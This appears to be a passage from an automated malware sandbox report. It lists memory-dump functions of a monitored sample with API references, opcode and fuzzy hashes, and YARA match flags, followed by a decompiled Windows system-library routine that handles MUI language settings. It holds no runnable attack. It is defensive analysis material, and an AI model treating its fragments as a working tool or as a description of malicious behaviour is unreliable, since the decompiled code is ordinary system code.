                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                        • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                                                                        • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                        • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 01F6FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                        • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                                                                        • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                        • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 01F6FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                        • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                        • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                        • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0009A062, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00094506,?,00094C7F,00094C7F,?,00094506,?,?,?,?,?,00000000,00000000,?), ref: 0009A05D
                                                                                                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A09D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocateFree
                                                                                                                                                        • String ID: .z`
                                                                                                                                                        • API String ID: 2488874121-1441809116
                                                                                                                                                        • Opcode ID: 7d0143c6f0db6b0a05b2973b0d93bd591d0dc5f0877b312f0eedba16aca69064
                                                                                                                                                        • Instruction ID: 752f7c4c5675a8a4b6a2a99c174458d5eeb5cce2d2f032448b6a8e2403d59bef
                                                                                                                                                        • Opcode Fuzzy Hash: 7d0143c6f0db6b0a05b2973b0d93bd591d0dc5f0877b312f0eedba16aca69064
                                                                                                                                                        • Instruction Fuzzy Hash: C201F2B92042446FDB14DF24DC85DDB7B98EF85304F158588F88817302C230E814CBF1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0009A070, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A09D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                        • String ID: .z`
                                                                                                                                                        • API String ID: 3298025750-1441809116
                                                                                                                                                        • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                        • Instruction ID: a7483037e4c1910e9d9a21d5e5a2e149c0cc1c863966a88349e8802865b111dc
                                                                                                                                                        • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                        • Instruction Fuzzy Hash: F5E04FB12002086BDB14DF59CC45EE777ACEF88750F018554FD0857242C630F910CAF0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00088373, Relevance: 3.2, APIs: 2, Instructions: 193threadwindowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008834A
                                                                                                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008836B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1836367815-0
                                                                                                                                                        • Opcode ID: 7ddf9a159cb096153a02bf5f2759f2b2fce5d8c274645e9401d82ffaa26a3d5c
                                                                                                                                                        • Instruction ID: 270ed06dec5bcc69aaf0c187e7f0b0c1c9a73dec3cc22140fc28c61686c36787
                                                                                                                                                        • Opcode Fuzzy Hash: 7ddf9a159cb096153a02bf5f2759f2b2fce5d8c274645e9401d82ffaa26a3d5c
                                                                                                                                                        • Instruction Fuzzy Hash: DE61A171A01209AFDB24EF64DC86FEBB7A8FB45704F10446DF94997242DB70AA01CBA5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 000882F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008834A
                                                                                                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008836B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1836367815-0
                                                                                                                                                        • Opcode ID: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
                                                                                                                                                        • Instruction ID: b15f46ee9257f5a5c87ffb515308c002f2a10d2124ddc5db4670f24c2034491f
                                                                                                                                                        • Opcode Fuzzy Hash: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
                                                                                                                                                        • Instruction Fuzzy Hash: 9C018F31A802287AFB20B6949C43FFE776CAB51F51F044119FB04BA1C2EAD46A0657E6
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0009A0E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A134
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateInternalProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2186235152-0
                                                                                                                                                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                        • Instruction ID: 4a9b53bd2a9bc7990f2f7393a3eeed257928f61c893ff4aa5ad3e931d0c8cf1f
                                                                                                                                                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                        • Instruction Fuzzy Hash: 4D01B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0DA7241C630E851CBA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0009A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00094506,?,00094C7F,00094C7F,?,00094506,?,?,?,?,?,00000000,00000000,?), ref: 0009A05D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                        • Instruction ID: ec980586e866633e4aeb80c8be97deace24af98f09b0c5f3d0675f8f0a4febe8
                                                                                                                                                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                        • Instruction Fuzzy Hash: 80E012B1200208ABDB14EF99CC81EA777ACEF88650F118558BA086B242C630F9108AF0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0009A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008F1A2,0008F1A2,?,00000000,?,?), ref: 0009A200
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3899507212-0
                                                                                                                                                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                        • Instruction ID: 4ff4872ce74a436925e1108b6439f3c92e3127fea3b99fbfc9c4cc2734285a84
                                                                                                                                                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                        • Instruction Fuzzy Hash: 55E01AB12002086BDB10DF49CC85EE737ADEF89650F018154BA0867242C930E8108BF5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0008F6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,00088CF4,?), ref: 0008F6CB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorMode
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                                        • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                                                                                                                        • Instruction ID: 6417aeeebd7252583303f3220bff117056388d79c37cbfd200bc3d3567543684
                                                                                                                                                        • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                                                                                                                        • Instruction Fuzzy Hash: 22D0A7717903043BEA10FAA49C03F6632CD6B44B04F490074FA88D73C3E950E4014165
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        Function 01F98788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                        			E01F98788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E01F98460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E01F7E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E01F9718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E01F98460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E01F9718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E01F98460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E01F98460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E01F98460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E01F9718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E01F7E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E01F72340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E01F8E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E01F7E2A8(_t322,  &_v68, _v16);
								if(E01F95553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E01F8E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E01F7E2A8(_t322,  &_v68, _t236);
								if(E01F95553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E01F9718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E01F7E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E01F72340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E01F8E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E01F7E2A8(_v12,  &_v68, _v16);
							if(E01F95553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E01F8E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E01F7E2A8(_t322,  &_v68, _t269);
							if(E01F95553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E01F9718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E01F7E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E01F72340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E01F8E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E01F7E2A8(_v12,  &_v68, _v16);
						if(E01F95553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E01F8E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E01F7E2A8(_t322,  &_v68, _t296);
						if(E01F95553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                                                                                                                        0x01f98788
                                                                                                                                                        0x01f98788
                                                                                                                                                        0x01f98791
                                                                                                                                                        0x01f98794
                                                                                                                                                        0x01f98798
                                                                                                                                                        0x01f9879b
                                                                                                                                                        0x01f9879e
                                                                                                                                                        0x01f987a1
                                                                                                                                                        0x01f987a4
                                                                                                                                                        0x01f987a7
                                                                                                                                                        0x01f987aa
                                                                                                                                                        0x01f987af
                                                                                                                                                        0x01fe1ad3
                                                                                                                                                        0x01f98b0a
                                                                                                                                                        0x01f98b0d
                                                                                                                                                        0x01f98b13
                                                                                                                                                        0x01f98b19
                                                                                                                                                        0x01f98b1f
                                                                                                                                                        0x01f98b25
                                                                                                                                                        0x01f98b2b
                                                                                                                                                        0x01f98b31
                                                                                                                                                        0x01f98b37
                                                                                                                                                        0x01f98b3d
                                                                                                                                                        0x01f98b46
                                                                                                                                                        0x01f98b46
                                                                                                                                                        0x01f987c6
                                                                                                                                                        0x01f987d0
                                                                                                                                                        0x01fe1ae0
                                                                                                                                                        0x01fe1ae6
                                                                                                                                                        0x01fe1af8
                                                                                                                                                        0x01fe1af8
                                                                                                                                                        0x01fe1afd
                                                                                                                                                        0x01fe1afe
                                                                                                                                                        0x01fe1b01
                                                                                                                                                        0x01fe1b06
                                                                                                                                                        0x01fe1b06
                                                                                                                                                        0x01f987d6
                                                                                                                                                        0x01f987f2
                                                                                                                                                        0x01f987f7
                                                                                                                                                        0x01f98807
                                                                                                                                                        0x01f9880a
                                                                                                                                                        0x01f9880f
                                                                                                                                                        0x01f98810
                                                                                                                                                        0x01f98813
                                                                                                                                                        0x01f98818
                                                                                                                                                        0x01f98818
                                                                                                                                                        0x01f9882c
                                                                                                                                                        0x01f98831
                                                                                                                                                        0x01f98838
                                                                                                                                                        0x01f98908
                                                                                                                                                        0x01f98920
                                                                                                                                                        0x01f989f0
                                                                                                                                                        0x01f98a08
                                                                                                                                                        0x01f98af6
                                                                                                                                                        0x01f98af6
                                                                                                                                                        0x01f98af8
                                                                                                                                                        0x01f98afb
                                                                                                                                                        0x01fe1beb
                                                                                                                                                        0x01fe1beb
                                                                                                                                                        0x01f98b04
                                                                                                                                                        0x01fe1bf8
                                                                                                                                                        0x01fe1c0e
                                                                                                                                                        0x01fe1c13
                                                                                                                                                        0x01fe1c16
                                                                                                                                                        0x01fe1c16
                                                                                                                                                        0x01fe1bf8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01f98b04
                                                                                                                                                        0x01f98a0e
                                                                                                                                                        0x01f98a11
                                                                                                                                                        0x01f98a14
                                                                                                                                                        0x01f98a15
                                                                                                                                                        0x01f98a18
                                                                                                                                                        0x01f98a22
                                                                                                                                                        0x01f98b59
                                                                                                                                                        0x01f98a28
                                                                                                                                                        0x01f98a3c
                                                                                                                                                        0x01f98a3c
                                                                                                                                                        0x01f98a42
                                                                                                                                                        0x01fe1bb0
                                                                                                                                                        0x01fe1b11
                                                                                                                                                        0x01fe1b11
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01f98a48
                                                                                                                                                        0x01f98a51
                                                                                                                                                        0x01f98a5b
                                                                                                                                                        0x01f98a5e
                                                                                                                                                        0x01f98a61
                                                                                                                                                        0x01f98a69
                                                                                                                                                        0x01f98a69
                                                                                                                                                        0x01f98a6d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01f98a74
                                                                                                                                                        0x01f98a7c
                                                                                                                                                        0x01f98a7d
                                                                                                                                                        0x01f98a91
                                                                                                                                                        0x01f98a93
                                                                                                                                                        0x01f98a93
                                                                                                                                                        0x01f98a98
                                                                                                                                                        0x01f98a9b
                                                                                                                                                        0x01f98aa1
                                                                                                                                                        0x01f98aa1
                                                                                                                                                        0x01f98aa4
                                                                                                                                                        0x01f98aaa
                                                                                                                                                        0x01f98ab1
                                                                                                                                                        0x01f98ac5
                                                                                                                                                        0x01f98ac7
                                                                                                                                                        0x01f98ac7
                                                                                                                                                        0x01f98ac5
                                                                                                                                                        0x01f98ace
                                                                                                                                                        0x01fe1bc9
                                                                                                                                                        0x01fe1bce
                                                                                                                                                        0x01fe1bd2
                                                                                                                                                        0x01fe1bd2
                                                                                                                                                        0x01f98ad8
                                                                                                                                                        0x01f98aeb
                                                                                                                                                        0x01f98aeb
                                                                                                                                                        0x01f98af0
                                                                                                                                                        0x01f98af4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01f98af4
                                                                                                                                                        0x01f98a42
                                                                                                                                                        0x01f98926
                                                                                                                                                        0x01f98929
                                                                                                                                                        0x01f9892c
                                                                                                                                                        0x01f9892d
                                                                                                                                                        0x01f98930
                                                                                                                                                        0x01f98935
                                                                                                                                                        0x01f9893a
                                                                                                                                                        0x01f98b51
                                                                                                                                                        0x01f98940
                                                                                                                                                        0x01f98954
                                                                                                                                                        0x01f98954
                                                                                                                                                        0x01f9895a
                                                                                                                                                        0x01fe1b63
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01f98960
                                                                                                                                                        0x01f98969
                                                                                                                                                        0x01f98973
                                                                                                                                                        0x01f98976
                                                                                                                                                        0x01f98979
                                                                                                                                                        0x01f9897e
                                                                                                                                                        0x01f98981
                                                                                                                                                        0x01f98981
                                                                                                                                                        0x01f98986
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fe1b6e
                                                                                                                                                        0x01fe1b74
                                                                                                                                                        0x01fe1b7b
                                                                                                                                                        0x01fe1b8f
                                                                                                                                                        0x01fe1b91
                                                                                                                                                        0x01fe1b91
                                                                                                                                                        0x01fe1b99
                                                                                                                                                        0x01fe1b9c
                                                                                                                                                        0x01fe1ba2
                                                                                                                                                        0x01fe1ba2
                                                                                                                                                        0x01f9898c
                                                                                                                                                        0x01f98992
                                                                                                                                                        0x01f98999
                                                                                                                                                        0x01f989ad
                                                                                                                                                        0x01fe1ba8
                                                                                                                                                        0x01fe1ba8
                                                                                                                                                        0x01f989ad
                                                                                                                                                        0x01f989b6
                                                                                                                                                        0x01f989c8
                                                                                                                                                        0x01f989cd
                                                                                                                                                        0x01f989d0
                                                                                                                                                        0x01f989d0
                                                                                                                                                        0x01f989d6
                                                                                                                                                        0x01f989e8
                                                                                                                                                        0x01f989e8
                                                                                                                                                        0x01f989ed
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01f989ed
                                                                                                                                                        0x01f9895a
                                                                                                                                                        0x01f9883e
